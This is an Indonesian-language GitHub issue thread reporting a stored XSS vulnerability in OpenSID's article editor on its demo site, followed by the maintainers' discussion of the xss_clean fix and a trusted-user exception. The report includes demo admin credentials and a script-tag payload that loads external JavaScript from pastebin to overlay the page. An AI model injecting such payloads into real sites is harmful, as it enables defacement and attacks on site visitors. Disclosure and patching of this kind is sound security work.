### ISSUE TITLE
[Security] JavaScript Overlay on demo.opensid.info

### ISSUE THREAD

**Issue by gustisf** [OpenSID/OpenSID#1178]
### Bagaimana alurnya sampai muncul masalah?

1. Pergi ke halaman http://demo.opensid.info/index.php/siteman/, isi username "admin" password "sid304".
2. Lanjut ke langkah tambahkan berita desa.
3. Isi bagian title dan descripsi dengan payload di bawah ini;
<script type="text/javascript" src="https://pastebin.com/raw/HPphB3LK"></script>

Untuk info lebih jelas silahkan cari di google dengan keyword "Menutup halaman dengan JSO"

4. Simpan dan lihat halaman 
http://demo.opensid.info/index.php/web/, dan secara tidak sengaja saya temukan bug itu pada bagian edit berita daerah.

### Seperti apa yang diharapkan?
Yang saya harapkan adalah agar team OPENSID bisa melakukan pemfilteran special karakter, seperti HTML dan Javascript. karna input yang di keluarkan berasal dari kesalahan filter javascript dari halaman tersebut.

### Apa yang terjadi?
Tertimpan dan Tertutup halaman dengan Javascript.

### Informasi tambahan 

| Tanya            | Jawab
| ---------------- | ---
| Versi OpenSID    | 2.x
| Versi PHP        | 
| System operasi   |

**Comment by eddieridwan** [comment]
Error ini timbul karena pada waktu pindah ke Codeigniter 3.1.8, global_xss_filtering tidak lagi berfungsi. Sehingga harus diganti dengan cara lain. 

Kami gunakan security->xss_clean untuk membersihkan data artikel sebelum ditampilkan.

**Comment by metalab25** [comment]
Om Paw Paw sedang mencoba membuat bug fixnya. Kami komunikasi di WA grup admin bung eddie

**Comment by eddieridwan** [comment]
Perlu dites lebih lanjut sebelum issue ini bisa ditutup.

**Comment by eddieridwan** [comment]
Menggunakan `security->xss_clean` juga membuat tag seperti `<iframe>` dan lainnya menjadi tidak aktif, sehingga membatasi apa yang bisa ditampilkan di artikel. 

Bagaimana caranya membolehkan penggunaan tag yg dianggap resiko keamanan? Sebenarnya kalau yang membuat/menyetujui artikel adalah orang terpercaya mungkin boleh saja.

Di situs demo tidak ada pengguna yg bisa dipercaya. Tetapi di situs biasa, mungkin pengguna tertentu, bisa diberi hak untuk melewati `xss_clean`.  Jadi mungkin caranya melalui setting yang hanya dipasang di file `desa/config/config.php` dan tidak di setting_aplikasi. Setting ini kemudian memberi hak pada pengguna tertentu untuk membuat artikel berisi tag seperti `<iframe>`.

**Comment by metalab25** [comment]
Sepertinya metode seperti itu saat ini adalah solusi terbaik. Namun saya tidak mampu untuk membuat itu

**Comment by eddieridwan** [comment]
Sekarang di pra-rilis data widget dinamis juga dibersihkan sebelum ditampilkan.

**Comment by eddieridwan** [comment]
Sekarang disediakan setting yang hanya dipasang di file desa/config/config.php untuk mendaftarkan user terpecaya. Setting ini kemudian memberi hak pada pengguna tersebut untuk membuat artikel berisi tag seperti <iframe>.

**Comment by eddieridwan** [comment]
Sudah dicommit ke master.
